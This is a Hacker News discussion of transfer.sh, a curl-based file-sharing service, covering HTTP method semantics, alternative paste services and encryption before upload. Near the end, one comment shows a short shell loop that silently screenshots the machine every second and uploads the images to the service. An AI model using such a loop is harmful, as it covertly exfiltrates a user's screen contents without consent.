$ cat ~/myfile | curl -X PUT --upload-file "-" https://transfer.sh/myfile.txt (transfer.sh)
296 points by _hv99 on March 20, 2016 | hide | past | favorite | 120 comments



FYI PUT is misused here. From RFC 7231 [1]:

    The PUT method requests that the state of the target resource be
    created or replaced with the state defined by the representation
    enclosed in the request message payload.  A successful PUT of a given
    representation would suggest that a subsequent GET on that same
    target resource will result in an equivalent representation being
    sent in a 200 (OK) response.
Placing the PUT body at a different location and returning a pointer to it is not supported by this definition. Furthermore:

    Proper interpretation of a PUT request presumes that the user agent
    knows which target resource is desired.  A service that selects a
    proper URI on behalf of the client, after receiving a state-changing
    request, SHOULD be implemented using the POST method rather than PUT.
    If the origin server will not make the requested PUT state change to
    the target resource and instead wishes to have it applied to a
    different resource, such as when the resource has been moved to a
    different URI, then the origin server MUST send an appropriate 3xx
    (Redirection) response; the user agent MAY then make its own decision
    regarding whether or not to redirect the request.
That is, to get the effect you intend, you should either (a) use POST (from which you should return a 201 with the final destination, not 200 like you currently do), or (b) issue a 307 redirect to the final destination of the PUT before accepting any content (and subsequently replying with a 201).
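For reference, a conforming POST-based exchange would look roughly like this (the upload path and the generated URL are invented for illustration):

    POST /upload HTTP/1.1
    Host: transfer.sh
    Content-Type: text/plain
    Content-Length: 12

    Hello world!

    HTTP/1.1 201 Created
    Location: https://transfer.sh/aBc12/myfile.txt

The client never has to guess the final URI; the server picks it and announces it in the Location header.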

[1] http://tools.ietf.org/html/rfc7231#section-4.3.4


This was not an invalid use of PUT in RFC2616, then httpbis decided it always had been and changed it.


It was part of RFC 2616, also:

"The PUT method requests that the enclosed entity be stored under the supplied Request-URI. If the Request-URI refers to an already existing resource, the enclosed entity SHOULD be considered as a modified version of the one residing on the origin server. If the Request-URI does not point to an existing resource, and that URI is capable of being defined as a new resource by the requesting user agent, the origin server can create the resource with that URI.

".. The fundamental difference between the POST and PUT requests is reflected in the different meaning of the Request-URI. The URI in a POST request identifies the resource that will handle the enclosed entity. That resource might be a data-accepting process, a gateway to some other protocol, or a separate entity that accepts annotations. In contrast, the URI in a PUT request identifies the entity enclosed with the request -- the user agent knows what URI is intended and the server MUST NOT attempt to apply the request to some other resource."

RFC2616[1] Fielding, et al.

This is a key part of the spec, and you can see Dr. Fielding's intentions in REST. Specific URIs referring to a representation of an entity are a core architectural component of REST[2].

1. https://www.w3.org/Protocols/rfc2616/rfc2616-sec9.html#sec9....

2. https://www.ics.uci.edu/~fielding/pubs/dissertation/top.htm


colanderman is correct in his reply. Although RFCs are designed to be very explicit, certain sections are all too often left open to interpretation when vague/ambiguous language is used.

This is not one of those times. It is very clearly defined that PUT, by design, creates a resource at the exact URL provided. The 307 redirect variant mentioned is over-complicating the scenario. The right thing to do is use POST and return 201 Created with a Location header to the created URL.

Just because it works as-is doesn't mean there isn't a better way that strictly follows expected behaviors.


Why give that elaborate command line call instead of the clearer, simpler one in the example?

    curl --upload-file ./hello.txt https://transfer.sh/hello.txt
In any case - cool! Good domain name too.


I think the point is to illustrate that you can pipe things into it. There exist programs that work on files, and work much worse or not at all on standard input; this example thus demonstrates more power.

(Though, alluded to below, the "-X PUT" may be totally superfluous.)


The pipe is into curl; it has nothing to do with the website itself.


The website must support the feature. With `--upload-file` curl sends the `Content-Length` header; with the pipe it doesn’t.


You can do that with pure pipes, without cat:

    foo < input
This replaces foo's stdin with the file input itself (opened directly, rather than through a pipe).
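For most programs the two forms are interchangeable; a throwaway check (hypothetical /tmp paths, assumed writable):

```shell
# create a small sample input
printf 'one\ntwo\nthree\n' > /tmp/demo.txt

# classic "useless use of cat" vs. plain redirection
cat /tmp/demo.txt | wc -l    # counts 3 lines, via a pipe
wc -l < /tmp/demo.txt        # same count, one process fewer
```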


Or like this with HTTPie[0]:

    http PUT https://transfer.sh/hello.txt < ./hello.txt
[0] http://httpie.org


Because unlike these other examples, this one requires you to install something


"requires you to install something" is relative, depending on what's installed on your system. This example is a continuation of the 'elaborate vs. simpler command' theme of this thread for people who prefer HTTPie.


Just FYI, it would have been helpful if you had disclosed that you're the author of HTTPie.


FYI The "-X PUT" argument is not doing what you think it is[1], and is superfluous since you're using "--upload-file".

You almost never really want "-X".

[1]: https://curl.haxx.se/docs/manpage.html#-X


Just to clarify your point, --upload-file with a trailing slash results in a POST and without a trailing slash it results in a PUT.


Right. -X overrides this default behavior without otherwise affecting the semantics of the request.


Haw. I made much the same service, curl-compatible and all, except it encrypts the file on disk upon reception (creating an AES cipher and piping the file through it while receiving it) and sends back the id of the file along with the key that allows decryption of said file. If anyone is interested there's plenty of documentation, even a client that lets you take screenshots and upload them on the fly.

https://up.depado.eu

So yeah it's limited to 30MB for now because I don't have a lot of storage but hey I use that daily hehe


Very cool, though I find it a little odd. If someone is going the extra mile to store the file encrypted, it stands to reason that trusting the service with the initial unencrypted byte stream is a no-go. The file being uploaded over HTTPS, and your assurance that the stream is piped directly through encryption, is of little consequence if you or an infiltrator to your server were to choose to be malicious.

I understand it's impossible to make the concept work with a very simple shell one-liner and without a further dependency like an openssl binary. I like the concept, but I'd rather do a one-time install of openssl or similar and copy a 10-20 line bash script to get true security, rather than your current setup with its technically flawed security model.
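The openssl approach mentioned above is easy to sketch. This assumes an OpenSSL 1.1.1+ binary (for -pbkdf2); the upload command and filenames are illustrative only:

```shell
# sample plaintext
printf 'hello\n' > hello.txt

# encrypt locally so the server only ever sees ciphertext
# (a literal -pass pass:... is for illustration; prefer a prompt in practice)
openssl enc -aes-256-cbc -pbkdf2 -salt -pass pass:mysecret \
    -in hello.txt -out hello.txt.enc

# upload only the ciphertext (hypothetical transfer-style URL):
#   curl --upload-file hello.txt.enc https://transfer.sh/hello.txt.enc

# the recipient decrypts after downloading
openssl enc -d -aes-256-cbc -pbkdf2 -pass pass:mysecret \
    -in hello.txt.enc -out hello.decrypted.txt
```

With this scheme the service operator (malicious or compromised) never handles the plaintext at all.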

Obviously you are aware of this, and chose the path of convenience and "good for most uses". Kudos for a clean tool!


Obviously it comes down to personal judgment when people use my tools. I mean, they could also do as described on transfer.sh and pipe the data through gpg first. The server accepts any kind of data as long as it doesn't exceed the current size limit.

But indeed I do agree that I can't guarantee, or even prove, that I can't access the files on my server. That's why I offer a quick and simple way for people to set this up on their own machine, so they can run this lightweight server and use it as if it were mine, just by modifying a line in the client's configuration file (or changing the URL in the curl commands).

I'm glad you enjoyed the tool though :D


I also made a similar service, mostly for my own needs so it's kinda spartan, I find it convenient for grabbing stuff off my clipboard and screenshots/captures:

http://paste.click/

It has a rudimentary android app as well.


It'd be cool to have the ability to pipe stuff over the Internet from shell in real time like you would with SSH for instance. So I could do:

A$ curl --upload-file - http://blah < /proc/kmsg

B$ curl http://blah/uYsfVX

and see live stream of data on B.


You can do that with netcat if either A or B is listening.


I do this fairly regularly.

    A$ tar cv * | nc -l -p 1234

    B$ nc a.example.net 1234 | tar xv
Or I might remove a 'v' and pipe through 'pv' to see the transfer rate and amount.


Well, "over the Internet" kind of implies being behind a firewall, so the service would be a convenience to avoid setting up port forwarding etc.


VPNs are a thing.

I recommend just installing cjdns and forwarding the home end. It also encrypts your traffic. You wouldn't want to netcat in cleartext over the internet.


You could always just pipe it through ssh or some other thing. Setting up openvpn or similar is nontrivial - even if you're lucky enough to have a static IP and enough spare time to make it work.


> Setting up openvpn or similar is nontrivial

Setting up cjdns is less work than setting up SSH.


Someone else in this thread mentioned chunk.io which offers this http://chunk.io/#stream_content_beta


That would be cool, but the devil is in the details. For one thing, does the "upload" wait for at least one "download" to connect? Or does "upload" go to a cache that is re-used for all subsequent downloads? What are the timeouts? E.g. how long would blah.com hold the upload connection open until (at least one) download opened up?

The other thing that makes it less cool is that it's a hack that would be better off not existing. The ideal case is that every device should have a unique ID, such that we can directly "subscribe" to anything on any device without using an intermediary (well, an application level intermediary anyway; you'll always be using link-level intermediaries). Such an ID might be IPv6, in which case such a service is trivially replaced with ordinary every day ssh/scp.


I think it should be as dumb and simple as possible and do nothing deviating from normal Unix behavior (i.e. a pipe). So it would cache only one chunk of data sent by A and start streaming to the first download request.



You can use netcat for that. Or Bash has built-in TCP support.


Regarding their tagline, “Easy file sharing from the command line”: this is also possible with Yandex Disk¹ (specifically, the Linux version here²). It also has fewer limitations than transfer.sh, specifically:

• 10 GB of space for free (with a 10 GB filesize limitation³) over transfer.sh’s 5 GB

• no file expiration date, unlike transfer.sh’s 14-day expiration

――――――

¹ — https://disk.yandex.com/

² — https://repo.yandex.ru/yandex-disk/

³ — https://en.wikipedia.org/wiki/Comparison_of_file_hosting_ser...



I built an R library for working with the b2 API:

https://github.com/phillc73/backblazer

It's on CRAN too, but the GitHub version has some updates.

This library should allow complete interaction with b2 for uploading, downloading and manipulating files from within R.


Yeah, but the thing is that with transfer.sh you don't have to install any applications on your machine. And if you look at the code, you'll see that the max size isn't being enforced.


I like using chunk.io for this purpose too

  $ curl -T path/to/file chunk.io


    chunk.io uses an invalid security certificate. The certificate is only valid for the following names: *.herokuapp.com, herokuapp.com Error code: SSL_ERROR_BAD_CERT_DOMAIN
I've signed up for the mailing list in the hopes of getting an actual contact email for the author/s.


Yeah! Me too. /s


It doesn't seem very cheap to run given enough users, yet I don't see anybody trying to sell me something. So, how?


Get users, then start to offer premium features? Off the top of my head:

  * Increased filesize limits
  * Support for custom domains
  * Ability to set download limits or kill date per file
  * Analytics about file downloads
  * Support for hosted version


I always wonder how sites like these deal with stuff like potentially hosting child porn/other content that is illegal to possess. Does DMCA safe harbor stuff cover it? (I don't see a DMCA notice on the site.)


You can leave out the 'potentially'. I shut down a file sharing service for specifically that reason; it is just about impossible not to become a vector for the transmission of illegal or objectionable content. The DMCA does not cover it, because the DMCA is about copyright, not about content that is illegal to possess regardless of how you got it. That said, the police (at least, the police here) are more than happy to work together with you to help keep the CP peddlers out, but it's a losing battle: there are a very large number of them, you'll be hard pressed to work 24/7 all year long, and since people can upload encrypted files you can't be sure what's being transferred anyway.

Which is a good thing; after all, what is being uploaded is strictly speaking none of my business. But it automatically makes you complicit, in roughly the same way that running a Tor exit node makes you complicit, and I don't want any part of that. I'm perfectly okay with setting up useful services at very little or no fee at all, but I refuse to become an unwitting and unwilling partner in other people's illegal dealings.

Which is a pity.


We're lucky that some people are fine with becoming an unwilling partner since without them no internet, no phone, no email, no snail mail, no roads, no electricity, no open source software, no nothing. It's a sad fact of life that pretty much every useful technology, service or piece of infrastructure will be used for illegal dealings of some kind.


It's a matter of proportion to me. If a service is used predominantly to facilitate illegality then I see no reason to continue to run it.

The internet, phones, email, regular mail, roads, electricity, software and so on have predominantly good and productive uses. File sharing websites attract, percentage-wise, more bad than good; at least more bad than what I'm comfortable with.

So in the end it's a moral call, and in this case my decision was to shut it down: because of the types of crimes involved, the criminals on the service totally outnumbered the 'good guys', and our ability to deal with the assholes was limited.


> If a service is used predominantly to facilitate illegality

I guess we should all stop using cash, then?

https://en.wikipedia.org/wiki/Contaminated_currency


It's obvious that you're trolling, but just in case you're not: eventually you can expect a push against cash in the name of anti-terrorism and anti-crime campaigns. Obviously those will be founded on bullshit, but that's not going to stop it from happening. Whether or not it will succeed is mostly a matter of how it gets sold to the public.

As for how it is possible for all of the available currency to be contaminated with traces of drugs and yet that this does not need to prove that all (or even a majority) of the cash transactions done are drug related, I'm sure you're smart enough to figure that one out for yourself, but evidence such as this will figure prominently in the kind of discussion that will visit us some years into the future.


False analogy. Creating a file upload service with no authentication and no resources to keep it safe is like installing a fully loaded AK-47 at an intersection and hoping people will just use it to learn how it works, or use it in an emergency to shoot at criminals passing that intersection.

There are free file upload services, and there are ways to upload from the command line[1].

[1] https://github.com/andreafabrizi/Dropbox-Uploader


You cannot compare bytes on a disk with a gun. People don't die from transferring data.


https://www.microsoft.com/en-us/photodna

Microsoft provides an API which identifies child-exploitation images.


How can you even test such a service legally?

This is a general problem with banning things instead of simply regulating them somehow. How would one scientifically study methamphetamine, for example, in a country where it is illegal to even possess it?

Without arguing for or against CP, what if I wanted to look up evidence that use of CP leads to increase or decrease of actual child abuse, without setting off red flags everywhere? As a Psych major, that sort of thing would interest me, for example.


> How can you even test such a service legally?

It's actually quite well designed and questions such as these were definitely taken into account during the design phase.

I came up with a similar scheme about 15 years ago (as a result of operating that file sharing service) and proposed to the local LE that we set up a service where a 'fingerprint' of an image could be tested against known bad images, and if an image tested positive it would be flagged for review (and on an exact match it would be automatically banned).

The local law enforcement officer thought it was a great idea but it would never fly because even the hashes of the images were considered off-limits for sharing with others and they'd have to share their database of hashes with me if I were to set this up (free of charge).

Eventually MS came up with PhotoDNA and they're too big to ignore.


So basically (probability of legal entity being a good actor) x (size of legal entity) must be >= some large number.

sigh, that's still less than ideal.


Agreed, but given the fact that this feeds into the legal system in a fairly direct way and that I'm only a 'one man shop' by their definition it makes good sense to insist on doing business with a larger party.

Where it goes haywire is that they then have to trust all the employees of that larger party as well but that's logic rather than CYA.


Yes, surprisingly I am more deeply concerned with the logic bit, lol


MSFT provides a set of sample images[1], some of which return as if they matched. The sample images are not child pornography, generally pictures of celebrities (which is really strange.)

[1]: http://wbintcvsstorage.blob.core.windows.net/matchedimages/S...


But wouldn't those matches count as classification errors?


I know. I helped them beta test that here in nl. Unfortunately it's not just still images. It's also videos, and encrypted still images and encrypted videos. Photodna comes into its own once you actually have an image.


I believe that DMCA safe harbor applies. If they're notified that they're hosting such content, then they have to remove it.


No. The safe harbor only applies to copyright infringement.


This reminds me of a node.js-based utility I wrote a while back called filebounce[1], except filebounce streams a file over HTTP/HTTPS and does not store the file on an intermediary server. It also supports tailored curl and GUI browser-based interfaces. I use it as a simple way of copying a file without needing ssh, ftp, samba, etc.

[1] https://github.com/mscdex/filebounce


Similar project: https://curl.io/


Big difference with curl.io is that you don't need to register the file upfront.


Love the idea. But the link always leads to a page with the file on it, not the file itself. Especially for picture sharing, that's not really acceptable for me.


I use sprunge [http://sprunge.us/] for the exact same purpose.

Normal usage: $ more c14.py | sprunge

And it outputs: http://sprunge.us/eCeM

The nice thing about sprunge is that you also have syntax highlighting: http://sprunge.us/eCeM?py

Appending a ?<lang> will syntax highlight the text according to the lang.

P.S.

To use a pipe with sprunge, put an alias in your .zshrc / .bashrc:

alias sprunge="curl -F 'sprunge=<-' http://sprunge.us"

and then run source ~/.zshrc (or ~/.bashrc).


I think the new thing about this is that they've released the code on GitHub under MIT, so you can self-host the service if you want. I think none of the other projects mentioned here are open source or have a self-hosted version.


I wrote a sprunge clone with a gimmick (the URL contains the sha256 digest of the paste) to learn Go. Ships with a Dockerfile. Probably doesn't scale. Affero GPL.

https://github.com/tomjakubowski/yasuc


sprunge (apparently) is released under WTFPL, and the sources are here https://github.com/rupa/sprunge.

According to http://www.wtfpl.net/about/, the first rule (and the only rule) of WTFPL is:

0. You just DO WHAT THE FUCK YOU WANT TO.

So, I guess you can self host it (:


http://ix.io/

Uploading a file: curl -F 'f:1=@file.ext' ix.io


ix.io is really meant for text only, or very small files (max of about 4MB).

[I'm friends with the author.]


I might be unusual here, but I typically get stuck when trying to copy files off a remote Windows machine. Most recently it was an aged Windows server with a version of Internet Explorer so old that all the modern file upload sites (e.g. https://file.io/) seemed to have JavaScript issues. Windows' built-in WebDAV support didn't work, because I think it's not installed on Windows Server.

Can anyone come up with a way to use a service like this from an old version of Windows that lacks a modern web browser, PowerShell and so on?


https://megatools.megous.com/ supports Windows. Not sure if it will run on an old version.


curl.exe / rsync.exe / winscp?


just transfer files from the old windows box using radmin or RDP


file.io has an API - you can just use curl for this


Why depend on a centralized service when there are easy-to-use decentralized alternatives?

  $ ipfs add myfile.txt
  added QmeeLUVdiSTTKQqhWqsffYDtNvvvcTfJdotkNyi1KDEJtQ myfile.txt
  # Access via a public gateway
  $ curl https://ipfs.io/ipfs/QmeeLUVdiSTTKQqhWqsffYDtNvvvcTfJdotkNyi1KDEJtQ
  # or via a local node
  $ curl http://127.0.0.1:8080/ipfs/QmeeLUVdiSTTKQqhWqsffYDtNvvvcTfJdotkNyi1KDEJtQ


1. If you're using ipfs.io, you're using a centralized service.

2. Why is a decentralized service better than a centralized one, for this use case? It seems like neither really has an inherent advantage.


1. ipfs.io is not a critical part of the system. If it becomes unavailable, the information can still be retrieved via a local node or another public gateway.

2. With a decentralized system like IPFS, availability of the data does not depend on a single provider. Also, there are no artificial limits on data size and storage time.


This isn't for long term storage, it's for ephemeral transfers between two well defined entities. Like if I, as developer A, need to give a large binary blob to another developer, B. If we are not in close enough proximity for physical media transfer, something like this might be the next quickest option. There's no need to go through the work of distributing it through the IPFS network.

TL;DR: different use cases.


This requires the service to be available at all times.

A much more ingenious approach is ipfs: [1]

[1] https://ipfs.io/


This is very cool. I built a similar tool for entire web projects called surge.sh

    surge path/to/project example.com


This is actually very useful.


You can use megatools to upload to a mega account from a command line, 50GB free, also encrypted.


What's the advantage of doing this instead of just using SCP or SFTP?


With SFTP and SCP you need to run a daemon on the hosting machine and create credentials for the other user to log in, so it's a bunch of extra steps.

For a lot of people with firewalls and no root / admin access, it becomes a major pain.


It's kinda funny that everything runs on port 80/443 nowadays because of this.


People who don't even know what a text shell is can just drag a file icon onto the page to upload. No accounts or passwords are involved at either end, so it's about as frictionless as possible.


Neat idea, and props for the https. Are the files encrypted on the server?


There's an example on how to encrypt the files before sending them to the server:

  # Encrypt files with password using gpg 
  $ cat /tmp/hello.txt|gpg -ac -o-|curl -X PUT --upload-file "-" https://transfer.sh/test.txt 
  
  # Download and decrypt 
  $ curl https://transfer.sh/1lDau/test.txt|gpg -o- > /tmp/hello.txt


Exactly, who trusts server side encryption anyway?


The first cat does absolutely nothing in your example.


Are you sure? How else would you pipe to gpg?


Just redirect gpg's input from the file?

    gpg ... < hello.txt | curl ...
Its stdin will be the file instead of a pipe, but few programs care about the difference and fewer still in such a way that you'd prefer to use the pipe.


It doesn't appear so, no. The raw bytes seem to be dumped to temp files, local storage, or S3 [1][2] without mention of any sort of encryption step (or reading of a secret somewhere). As mentioned below, you could encrypt before uploading of course. Someone please correct me if I misread though.

[1] https://github.com/dutchcoders/transfer.sh/blob/master/trans...

[2] https://github.com/dutchcoders/transfer.sh/blob/master/trans...


I built a similar service but for email:

Send files to i@nfil.es

Then you'll get something like this https://nfil.es/EOir5z/


How is it better than: [brew install gist] gist myfile.txt


Using Lisp with Drakma, the following function saves some content under a name:

    (defun save (name content)
      (multiple-value-bind (a b c)
          (http-request (format nil "https://transfer.sh/~a" name)
                        :method :put
                        :content (write-to-string content))
        (list a b c)))


Very similar to a project of mine from 5 years ago: http://sbit3.me

I even had an HN post: https://news.ycombinator.com/item?id=2598682 :)


    PS> cat myfile | out-string | iwr -Method Put -Uri https://transfer.sh/myfile.txt


  PS> Invoke-SSHCommand { cat ~/myfile | curl -X PUT --upload-file “-” https://transfer.sh/myfile.txt } -session 0
SSH.NET: https://sshnet.codeplex.com/


Obligatory xkcd : https://xkcd.com/949/


Just drop it on one of the folders in your Dropbox that's also served by IIS on one of your boxen. Then simply link from the appropriate subdomain on your personal domain. Been doing this for 15 years, dunno why nobody else does.


Cool story bro. Guess you were on a very early dropbox beta.


I have been using paste.click [0] for a while, it is similar to this. I use to share snippets of code, or screenshots

[0] http://paste.click/


You made my day;

I've been using http://mktorrent.sourceforge.net/ for quite some time now


Reminds me of another project: https://github.com/guits/pastefile


Yes, it's a good project, I use pastefile very often!


I like these simple web services.

One I use all the time is sprunge.us -

   $ echo "hello world" | curl -F sprunge="<-" sprunge.us
   http://sprunge.us/MEPN


Useless Use Of Cat.


https://ptpb.pw does pretty much the same exact thing and more.


Btw on mobile it's not clear which line is input and which line is output. Perhaps make them in slightly different colors.


What is the business plan? Ads?


An idea for how such a service could be used for nefarious purposes:

  while true
  do 
    dt=$(date '+%d%m%Y%H:%M:%S');
    screencapture -x file$dt.png
    curl --upload-file ./file$dt.png https://transfer.sh/66nb8/capture$dt.png
    rm file$dt.png
    sleep 1
  done


If you can get that script to run on a user's machine, they're hosed whether or not this service exists. Curl or mail to an endpoint in the attacker's control would be equally effective.


Sorry, I did not intend to discount this service in any way. More like showing a practical use.


Are the files being accepted by your service as multipart/form-data?


This seems like the same as termbin.com to me.


How do people feel about .sh domains?


Unfortunately, it is not practical to run this at home, because of asymmetric up/download speeds of my internet provider (upload is 20x slower than download).

Sigh!


There are a lot of sites like this. The only thing that's sorta neat about this one is that the filesize limit is so high. Getting around the size limit is fairly easy by using split or something similar, so that's not too big of a deal.

Others that come to mind are pomf.se clones like 1339.cf or comfy.moe and nekuneku's current site, uguu.se. Many paste services could also be used to achieve the same result, ix.io and sprunge.us come to mind.
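The split trick mentioned above takes only a few lines; the chunk prefix and the commented-out upload command are illustrative:

```shell
# make a 5 MB test file and cut it into 2 MB chunks
dd if=/dev/urandom of=big.bin bs=1M count=5 2>/dev/null
split -b 2M big.bin big.bin.part.

# each chunk could then be uploaded separately, e.g.:
#   for p in big.bin.part.*; do curl --upload-file "$p" https://transfer.sh/"$p"; done

# the recipient downloads the chunks and reassembles them in glob order
cat big.bin.part.* > big.bin.joined
cmp big.bin big.bin.joined && echo "files match"
```

The default split suffixes (aa, ab, ac, ...) sort lexicographically, so a plain glob reassembles the chunks in the right order.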



